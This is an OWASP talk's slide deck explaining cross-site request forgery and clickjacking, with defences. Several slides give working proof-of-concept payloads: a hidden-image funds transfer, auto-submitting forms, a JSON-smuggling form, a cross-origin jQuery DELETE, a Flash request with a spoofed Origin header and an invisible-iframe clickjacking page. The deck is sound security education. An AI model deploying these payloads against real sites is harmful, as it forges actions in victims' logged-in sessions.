Cross-site request forgery: ways to exploit, ways to prevent. Paulius Lescinskas.

1. Cross-site request forgery:
Ways to exploit, ways to prevent
Paulius Leščinskas, OWASP EEE Lithuania
2015-10-07

2. About Me
Paulius Leščinskas
Pod owner @ Adform
http://lescinskas.lt
Paulius.Lescinskas@gmail.com
@lescinskas
https://www.linkedin.com/in/pluton

3. Cross-site request forgery
(CSRF)
A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the
victim’s session cookie and any other automatically included authentication information, to a
vulnerable web application. This allows the attacker to force the victim’s browser to generate
requests the vulnerable application thinks are legitimate requests from the victim.
Thank you http://www.seclab.cs.sunysb.edu/seclab/jcsrf/ for the image.

4. Cross-site request forgery
(CSRF)
Typical impact:
• Initiate transactions (modify data)
• Access sensitive data
Prerequisite: victim MUST be logged-in to the target system.
Typical example:
<img src="http://example.com/app/transferFunds?
amount=1500&destinationAccount=attackersAcct#" width="0" height="0" />

5. Cross-site request forgery
(CSRF)
What about POST?

6. Cross-site request forgery
(CSRF)
Example 2 (POST request):
<form method="post" action="https://www.example.com/deleteUser">
<input type="hidden" name="id" value="1" />
</form>
<script>
document.forms[0].submit();
</script>

7. Cross-site request forgery
(CSRF)
No forms? Just RESTful JSON APIs?

8. Cross-site request forgery
(CSRF)
The same data will be sent differently as raw HTTP body. I.e.:
Name: John Doe
Text: 1 + 2 = 3
• Via HTML form (application/x-www-form-urlencoded):
Name=John+Doe&Text=1+%2B+2+%3D+3
• Using RESTful Web API formatted as JSON:
{"Text": "John Doe", "Text": "1 + 2 = 3"}

9. Cross-site request forgery
(CSRF)
Example 3 (POST JSON request, bypassing x-form-urlencoded structure):
<form method="post" action="https://www.example.com/deleteUser">
<input type="hidden" name='{id: 1, "ignore-me": "' value='test"}' />
</form>
<script>
document.forms[0].submit();
</script>
Data sent:
{"id": 1, "ignore-me": "=test"}
http://itsecurityconcepts.com/2014/04/22/csrf-on-json-requests/

10. Cross-site request forgery
(CSRF)
All HTTP methods (GET/POST/PUT/PATCH/DELETE ...) with any data encoding can be called using Javascript
(XmlHttpRequest aka XHR aka Ajax), if your Cross-origin resource sharing (CORS) headers allow you to call
XHR from any location:
OPTIONS /foo/bar
Host: example.com
Origin: http://foo.com
Vulnerable if:
Access-Control-Allow-Origin: *
jQuery example:
$.ajax({
url: 'http://example.com/foo/bar',
type: 'DELETE',
data: {"id": 1}
success: function(result) {
// Do something with the result
}
});

11. Cross-site request forgery
(CSRF)
Flash to the attack!

12. Cross-site request forgery
(CSRF)
Example 4 (any HTTP-based request using ActionScript):
import flash.net.URLRequest;
import flash.net.URLVariables;
import flash.net.URLRequestMethod;
import flash.net.URLRequestHeader;
import flash.net.URLLoader;
var loader:URLLoader = new URLLoader();
var req:URLRequest = new URLRequest("http://www.example.com/deleteUser");
var header:URLRequestHeader = new URLRequestHeader("Origin", "http://www.test.com"); // Setting Origin
header valid until Flash 9 somewhat
req.requestHeaders.push(header);
req.method = URLRequestMethod.DELETE;
req.contentType = 'application/json';
req.data = '{"id": 1}';
loader.load(req);

13. Cross-site request forgery
(CSRF)
... valid if example.com has crossdomain.xml like:
<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>
9/10 Lithuanian TOP10 websites has such crossdomain.xml
…mostly to load assets from flash-based banner ads.
... also, you can access ActionScript objects, functions and properties from the
SWF file, hosted on other domain, if this file has Security.allowDomain("*");
(Cross-scripting)

14. Cross-site request forgery
(CSRF)
Countermeasures
●
Synchronizer token pattern!
●
Check Origin header
●
Appropriate CORS headers
●
Appropriate crossdomain.xml rules
●
Short-living sessions (only reduces likelihood)
Very hard (impossible?) to prevent CSRF is website has XSS vulnerabilities
https://en.wikipedia.org/wiki/Cross-origin_resource_sharing
http://www.adobe.com/devnet/adobe-media-server/articles/cross-domain-xml-for-streaming.html
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet

15. ClickJacking

16. ClickJacking

17. ClickJacking
<html>
<body>
<iframe src="http://victim.site" style="position: absolute;
filter:alpha(opacity=0);opacity:0"></iframe>
<div style="position: relative; left: 10px; top: 10px; z-index: -1"><a
href="#">CLICK ME</a></div>
</body>
</html>
OVERRIDES ALL CSRF PROTECTIONS!
https://www.owasp.org/index.php/Clickjacking
http://www.troyhunt.com/2013/05/clickjack-attack-hidden-threat-right-in.html
https://community.qualys.com/blogs/securitylabs/2012/11/29/clickjacking-an-overlooked-web-security-hole

18. ClickJacking
Countermeasures
Framebusting: X-Frame-Options (XFO) response HTTP header or meta http-equiv
tag
X-Frame-Options: DENY (disallows page to be loaded in IFRAME)
X-Frame-Options: SAMEORIGIN (allows page to loaded in IFRAME from same origin)
X-Frame-Options: ALLOW-FROM https://trusted.domain (allows page to be loaded from
specific origins; unsupported by Chrome and Safari!)
Worldwide usage:
Facebook: DENY, Twitter: SAMEORIGIN, Github: DENY, 60% of Alexa Top 10 use framebusting...
https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet (+more defense techniques)
https://www.owasp.org/index.php/Testing_for_Clickjacking_(OTG-CLIENT-009)
https://developer.mozilla.org/en-US/docs/Web/HTTP/X-Frame-Options

19. Thank you!